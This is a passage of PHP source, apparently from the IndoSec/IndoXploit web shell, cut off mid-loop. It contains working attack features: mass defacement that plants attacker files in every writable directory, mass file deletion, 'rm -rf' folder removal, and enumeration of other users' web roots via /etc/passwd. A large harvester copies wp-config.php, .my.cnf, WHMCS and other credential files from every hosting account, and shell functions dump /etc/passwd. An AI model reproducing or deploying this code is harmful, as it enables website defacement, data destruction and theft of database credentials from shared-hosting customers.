  752. if ($_GET['aksi'] == 'buat_folder' ) {
  753. echo "
  754. <h4>$imgfol Buat Folder :</h4>
  755. <form method='POST'>
  756. <div class='input-group'>
  757. <input type='text' class='form-control' name='nama_folder[]' placeholder='Nama Folder...'>
  758. <div class='input-group-prepend'>
  759. <div class='input-group-text'><a id='add_input1'><i class='fa fa-plus'></i></a></div>
  760. </div>
  761. </div><br/>
  762. <div id='output1'></div>
  763. <input type='submit' class='btn btn-info btn-block' name='buat' value='Buat'>
  764. </form>";
  765.  
  766. if (isset($_POST['buat'])) {
  767. $nama = $_POST['nama_folder'];
  768. foreach ($nama as $nama_folder) {
  769. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder);
  770. $fd = @mkdir ($folder);
  771. }
  772. if ($fd) {
  773. $swa = "success";
  774. $text = "Berhasil Membuat Folder";
  775. swall($swa,$text,$dir);
  776. }else{
  777. $swa = "error";
  778. $text = "Gagal Membuat Folder";
  779. swall($swa,$text,$dir);
  780. }
  781. }
  782. }
  783.  
  784. /*
  785. Rename Folder
  786. */
  787. if ($_GET['aksi'] == 'rename_folder' ) {
  788. echo "
  789. [ <a href='?dir=".$dir."&aksi=rename_folder' class='active'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]
  790. <h4>$imgfol Rename Folder : $ndir </h4>
  791. <form method='POST'>
  792. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nama'><br/>
  793. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
  794. </form>";
  795.  
  796. if(isset($_POST['ganti'])) {
  797. $baru = htmlspecialchars($_POST['namanew']);
  798. $ubah = rename($dir, "".dirname($dir)."/".$baru."");
  799. if($ubah) {
  800. $swa = "success";
  801. $text = "Berhasil Mengganti Nama";
  802. $dir = dirname($dir);
  803. swall($swa,$text,$dir);
  804. }else{
  805. $swa = "error";
  806. $text = "Gagal Mengganti Nama";
  807. $dir = dirname($dir);
  808. swall($swa,$text,$dir);
  809. }
  810. }
  811. exit;
  812. }
  813.  
  814. /*
  815. Delete Folder
  816. */
  817. if ($_GET['aksi'] == 'hapus_folder' ) {
  818. echo "
  819. [ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder' class='active'>Delete</a> ]
  820. <div class='card card-body text-center text-dark mb-4'>
  821. <p>Apakah Yakin Menghapus : $ndir ?</p>
  822. <form method='POST'>
  823. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
  824. <input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'>
  825. </form>
  826. </div><br/>";
  827.  
  828. if ($_POST['ya']) {
  829. if(is_dir($dir)) {
  830. if(is_writable($dir)) {
  831. @rmdir($dir);
  832. @exe("rm -rf $dir");
  833. @exe("rmdir /s /q $dir");
  834. $swa = "success";
  835. $text = "Berhasil Menghapus";
  836. $dir = dirname($dir);
  837. swall($swa,$text,$dir);
  838. } else {
  839. $swa = "error";
  840. $text = "Berhasil Menghapus";
  841. $dir = dirname($dir);
  842. swall($swa,$text,$dir);
  843. }
  844. }
  845. }
  846. exit;
  847. }
  848.  
  849.  
  850. /*
  851. * Fungsi_Tambahan
  852. *
  853. *
  854. * Mass Deface
  855. * IndoXploit
  856. */
  857. if($_GET['aksi'] == 'masdef') {
  858. function tipe_massal($dir,$namafile,$isi_script) {
  859. if(is_writable($dir)) {
  860. $dira = scandir($dir);
  861. foreach($dira as $dirb) {
  862. $dirc = "$dir/$dirb";
  863. $lokasi = $dirc.'/'.$namafile;
  864. if($dirb === '.') {
  865. file_put_contents($lokasi, $isi_script);
  866. } elseif($dirb === '..') {
  867. file_put_contents($lokasi, $isi_script);
  868. } else {
  869. if(is_dir($dirc)) {
  870. if(is_writable($dirc)) {
  871. echo "Done > $lokasi\n";
  872. file_put_contents($lokasi, $isi_script);
  873. $masdef = tipe_massal($dirc,$namafile,$isi_script);
  874. }
  875. }
  876. }
  877. }
  878. }
  879. }
  880.  
  881. function tipe_biasa($dir,$namafile,$isi_script) {
  882. if(is_writable($dir)) {
  883. $dira = scandir($dir);
  884. foreach($dira as $dirb) {
  885. $dirc = "$dir/$dirb";
  886. $lokasi = $dirc.'/'.$namafile;
  887. if($dirb === '.') {
  888. file_put_contents($lokasi, $isi_script);
  889. } elseif($dirb === '..') {
  890. file_put_contents($lokasi, $isi_script);
  891. } else {
  892. if(is_dir($dirc)) {
  893. if(is_writable($dirc)) {
  894. echo "Done > $dirb/$namafile\n";
  895. file_put_contents($lokasi, $isi_script);
  896. }
  897. }
  898. }
  899. }
  900. }
  901. }
  902.  
  903. if($_POST['start']) {
  904. echo "[ <a href='?dir=$dir'>Kembali</a> ]
  905. <textarea class='form-control' rows='13' disabled=''>";
  906. if($_POST['tipe'] == 'mahal') {
  907. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  908. } elseif($_POST['tipe'] == 'murah') {
  909. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  910. }
  911. echo "</textarea><br/>";
  912. } else {
  913. echo "<form method='post'>
  914. <center>
  915. <h5>Tipe :</h5>
  916. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
  917. <label for='toggle-on' class='butn'>Biasa</label>
  918. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
  919. <label for='toggle-off' class='butn'>Masal</label>
  920. </center>
  921. <h5>$imgfol Lokasi :</h5>
  922. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  923. <h5>$imgfile Nama File :</h5>
  924. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
  925. <h5>$imgfile Isi File :</h5>
  926. <textarea name='script' class='form-control' rows='13' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>
  927. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
  928. </form>";
  929. }
  930. exit;
  931. }
  932.  
  933.  
  934. /*
  935. * mass delete
  936. * IndoXploit
  937. */
  938. if($_GET['aksi'] == 'masdel') {
  939. function hapus_massal($dir,$namafile) {
  940. if(is_writable($dir)) {
  941. $dira = scandir($dir);
  942. foreach($dira as $dirb) {
  943. $dirc = "$dir/$dirb";
  944. $lokasi = $dirc.'/'.$namafile;
  945. if($dirb === '.') {
  946. if(file_exists("$dir/$namafile")) {
  947. unlink("$dir/$namafile");
  948. }
  949. } elseif($dirb === '..') {
  950. if(file_exists("".dirname($dir)."/$namafile")) {
  951. unlink("".dirname($dir)."/$namafile");
  952. }
  953. } else {
  954. if(is_dir($dirc)) {
  955. if(is_writable($dirc)) {
  956. if($lokasi) {
  957. echo "$lokasi > Terhapus\n";
  958. unlink($lokasi);
  959. $massdel = hapus_massal($dirc,$namafile);
  960. }
  961. }
  962. }
  963. }
  964. }
  965. }
  966. }
  967.  
  968. if($_POST['start']) {
  969. echo "[ <a href='?dir=$dir'>Kembali</a> ]
  970. <textarea class='form-control' rows='13' disabled=''>";
  971. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  972. echo "</textarea><br/>";
  973. } else {
  974. echo "<form method='post'>
  975. <h5>$imgfol Lokasi :</h5>
  976. <input type='text' name='d_dir' value='$dir' class='form-control'><br/>
  977. <h5>$imgfile Nama File :</h5>
  978. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
  979. <input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
  980. </form>";
  981. }
  982. exit;
  983. }
  984.  
  985.  
  986. /*
  987. * Jumping
  988. * IndoXploit
  989. */
  990. if($_GET['aksi'] == 'jumping') {
  991. $i = 0;
  992. echo "<div class='card container'>";
  993. if(preg_match("/hsphere/", $dir)) {
  994. $urls = explode("\r\n", $_POST['url']);
  995. if(isset($_POST['jump'])) {
  996. echo "<pre>";
  997. foreach($urls as $url) {
  998. $url = str_replace(array("http://","www."), "", strtolower($url));
  999. $etc = "/etc/passwd";
  1000. $f = fopen($etc,"r");
  1001. while($gets = fgets($f)) {
  1002. $pecah = explode(":", $gets);
  1003. $user = $pecah[0];
  1004. $dir_user = "/hsphere/local/home/$user";
  1005. if(is_dir($dir_user) === true) {
  1006. $url_user = $dir_user."/".$url;
  1007. if(is_readable($url_user)) {
  1008. $i++;
  1009. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  1010. if(is_writable($url_user)) {
  1011. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  1012. }
  1013. echo $jrw."<br>";
  1014. }
  1015. }
  1016. }
  1017. }
  1018. if($i == 0) {
  1019. } else {
  1020. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1021. }
  1022. echo "</pre>";
  1023. } else {
  1024. echo '<center>
  1025. <form method="post">
  1026. List Domains: <br>
  1027. <textarea name="url" class="form-control">';
  1028. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1029. while($getss = fgets($fp)) {
  1030. echo $getss;
  1031. }
  1032. echo '</textarea><br>
  1033. <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
  1034. </form></center>';
  1035. }
  1036. } elseif(preg_match("/vhosts/", $dir)) {
  1037. $urls = explode("\r\n", $_POST['url']);
  1038. if(isset($_POST['jump'])) {
  1039. echo "<pre>";
  1040. foreach($urls as $url) {
  1041. $web_vh = "/var/www/vhosts/$url/httpdocs";
  1042. if(is_dir($web_vh) === true) {
  1043. if(is_readable($web_vh)) {
  1044. $i++;
  1045. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  1046. if(is_writable($web_vh)) {
  1047. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  1048. }
  1049. echo $jrw."<br>";
  1050. }
  1051. }
  1052. }
  1053. if($i == 0) {
  1054. } else {
  1055. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1056. }
  1057. echo "</pre>";
  1058. } else {
  1059. echo '<center>
  1060. <form method="post">
  1061. List Domains: <br>
  1062. <textarea name="url" class="form-control">';
  1063. bing("ip:$ip");
  1064. echo '</textarea><br>
  1065. <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
  1066.  
  1067. </form></center>';
  1068. }
  1069. } else {
  1070. echo "<pre>";
  1071. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
  1072. while($passwd = fgets($etc)) {
  1073. if($passwd == '' || !$etc) {
  1074. echo "<font color=red>Can't read /etc/passwd</font><br/>";
  1075. } else {
  1076. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1077. foreach($user_jumping[1] as $user_pro_jump) {
  1078. $user_jumping_dir = "/home/$user_pro_jump/public_html";
  1079. if(is_readable($user_jumping_dir)) {
  1080. $i++;
  1081. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  1082. if(is_writable($user_jumping_dir)) {
  1083. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  1084. }
  1085. echo $jrw;
  1086. if(function_exists('posix_getpwuid')) {
  1087. $domain_jump = file_get_contents("/etc/named.conf");
  1088. if($domain_jump == '') {
  1089. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1090. } else {
  1091. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1092. foreach($domains_jump[1] as $dj) {
  1093. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1094. $user_jumping_url = $user_jumping_url['name'];
  1095. if($user_jumping_url == $user_pro_jump) {
  1096. echo " => ( <u>$dj</u> )<br>";
  1097. break;
  1098. }
  1099. }
  1100. }
  1101. } else {
  1102. echo "<br>";
  1103. }
  1104. }
  1105. }
  1106. }
  1107. }
  1108. if($i == 0) {
  1109. } else {
  1110. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1111. }
  1112. echo "</pre>";
  1113. }
  1114. echo "</div><br/>";
  1115. exit;
  1116. }
  1117.  
  1118. /*
  1119. Config
  1120. */
  1121. if($_GET['aksi'] == 'config') {
  1122. if($_POST){
  1123. $passwd = $_POST['passwd'];
  1124. mkdir("indosec_config", 0777);
  1125. $isi_htc = "Options allnRequire NonenSatisfy Any";
  1126. $htc = fopen("indosec_config/.htaccess","w");
  1127. fwrite($htc, $isi_htc);
  1128. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1129. foreach($user_config[1] as $user_con) {
  1130. $user_config_dir = "/home/$user_con/public_html/";
  1131. if(is_readable($user_config_dir)) {
  1132. $grab_config = array(
  1133. "/home/$user_con/.my.cnf" => "cpanel",
  1134. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
  1135. "/home/$user_con/public_html/forum/config.php" => "phpBB",
  1136. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
  1137. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
  1138. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
  1139. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
  1140. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
  1141. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
  1142. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
  1143. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
  1144. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
  1145. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
  1146. "/home/$user_con/public_html/inc/config.php" => "MyBB",
  1147. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
  1148. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
  1149. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
  1150. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
  1151. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
  1152. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
  1153. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
  1154. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
  1155. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
  1156. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
  1157. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
  1158. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
  1159. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
  1160. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
  1161. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
  1162. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
  1163. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
  1164. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
  1165. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
  1166. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
  1167. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
  1168. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
  1169. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
  1170. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
  1171. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
  1172. "/home/$user_con/public_html/configuration.php" => "Joomla",
  1173. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
  1174. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
  1175. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
  1176. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
  1177. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
  1178. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
  1179. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
  1180. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
  1181. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
  1182. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
  1183. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
  1184. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
  1185. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
  1186. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
  1187. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
  1188. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
  1189. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
  1190. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  1191. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  1192. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
  1193. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
  1194. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
  1195. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
  1196. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
  1197. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
  1198. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
  1199. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
  1200. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
  1201. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1202. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
  1203. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
  1204. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
  1205. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
  1206. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
  1207. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
  1208. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
  1209. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
  1210. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
  1211. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
  1212. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
  1213. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
  1214. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
  1215. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
  1216. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
  1217. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
  1218. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1219. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
  1220. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
  1221. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1222. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
  1223. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
  1224. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
  1225. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
  1226. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
  1227. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
  1228. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
  1229. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
  1230. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
  1231. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
  1232. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
  1233. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1234. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1235. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1236. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
  1237. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1238. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
  1239. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
  1240. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1241. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1242. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1243. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
  1244. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
  1245. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
  1246. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
  1247. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
  1248. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
  1249. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
  1250. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
  1251. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
  1252. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
  1253. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
  1254. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
  1255. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1256. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
  1257. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
  1258. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1259. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
  1260. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
  1261. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
  1262. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
  1263. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
  1264. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1265. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
  1266. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
  1267. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1268. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1269. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1270. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
  1271. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
  1272. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
  1273. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
  1274. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1275. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
  1276. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
  1277. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
  1278. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
  1279. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
  1280. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1281. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
  1282. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
  1283. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
  1284. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
  1285. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
  1286. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
  1287. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
  1288. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
  1289. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
  1290. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
  1291. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
  1292. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
  1293. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
  1294. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
  1295. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
  1296. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
  1297. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
  1298. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
  1299. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1300. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
  1301. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
  1302. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
  1303. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
  1304. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1305. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
  1306. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
  1307. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1308. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
  1309. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1310. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
  1311. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
  1312. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
  1313. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
  1314. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1315. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1316. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
  1317. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
  1318. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
  1319. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
  1320. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1321. );
  1322. foreach($grab_config as $config => $nama_config) {
  1323. $ambil_config = file_get_contents($config);
  1324. if($ambil_config == '') {
  1325. } else {
  1326. $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w");
  1327. fputs($file_config,$ambil_config);
  1328. }
  1329. }
  1330. }
  1331. }
  1332. echo "<p class='text-center'>Success Get Config!!</p>
  1333. <a href='?dir=$dir/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>";
  1334. }else{
  1335. echo "<form method='post'>
  1336. <p class='text-danger'>/etc/passwd error ? <a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a></p>
  1337. <textarea name='passwd' class='form-control' rows='13'>".file_get_contents('/etc/passwd')."</textarea><br/>
  1338. <input type='submit' class='btn btn-danger btn-block' value='Get Config!!'>
  1339. </form>";
  1340. }
  1341. exit;
  1342. }
  1343.  
  1344.  
  1345. /*
  1346. Bypass etc/passwd
  1347. */
  1348. if($_GET['aksi'] == 'passwbypass') {
  1349. echo '<div claas="container">
  1350. <form method="POST">
  1351. <p class="text-center">Bypass etc/passwd With :</p>
  1352. <div class="d-flex justify-content-center flex-wrap">
  1353. <input type="submit" class="fiture btn btn-danger btn-sm" value="System Function" name="syst">
  1354. <input type="submit" class="fiture btn btn-danger btn-sm" value="Passthru Function" name="passth">
  1355. <input type="submit" class="fiture btn btn-danger btn-sm" value="Exec Function" name="ex">
  1356. <input type="submit" class="fiture btn btn-danger btn-sm" value="Shell_exec Function" name="shex">
  1357. <input type="submit" class="fiture btn btn-danger btn-sm" value="Posix_getpwuid Function" name="melex">
  1358. </div><hr/>
  1359. <p class="text-center">Bypass User With :</p>
  1360. <div class="d-flex justify-content-center flex-wrap">
  1361. <input type="submit" class="fiture btn btn-warning btn-sm" value="Awk Program" name="awkuser">
  1362. <input type="submit" class="fiture btn btn-warning btn-sm" value="System Function" name="systuser">
  1363. <input type="submit" class="fiture btn btn-warning btn-sm" value="Passthru Function" name="passthuser">
  1364. <input type="submit" class="fiture btn btn-warning btn-sm" value="Exec Function" name="exuser">
  1365. <input type="submit" class="fiture btn btn-warning btn-sm" value="Shell_exec Function" name="shexuser">
  1366. </div>
  1367. </form>';
  1368.  
  1369. $mail = 'ls /var/mail';
  1370. $paswd = '/etc/passwd';
  1371. if($_POST['syst']) {
  1372. echo"<textarea class='form-control' rows='13'>";
  1373. echo system("cat $paswd");
  1374. echo"</textarea><br/>";
  1375. }
  1376. if($_POST['passth']) {
  1377. echo"<textarea class='form-control' rows='13'>";
  1378. echo passthru("cat $paswd");
  1379. echo"</textarea><br/>";
  1380. }
  1381. if($_POST['ex']) {
  1382. echo"<textarea class='form-control' rows='13'>";
  1383. echo exec("cat $paswd");
  1384. echo"</textarea><br/>";
  1385. }
  1386. if($_POST['shex']) {
  1387. echo"<textarea class='form-control' rows='13'>";
  1388. echo shell_exec("cat $paswd");
  1389. echo"</textarea><br/>";
  1390. }
  1391. if($_POST['melex']) {
  1392. echo"<textarea class='form-control' rows='13'>";
  1393. for($uid=0;$uid<6000;$uid++){
  1394. $ara = posix_getpwuid($uid);
  1395. if (!empty($ara)) {
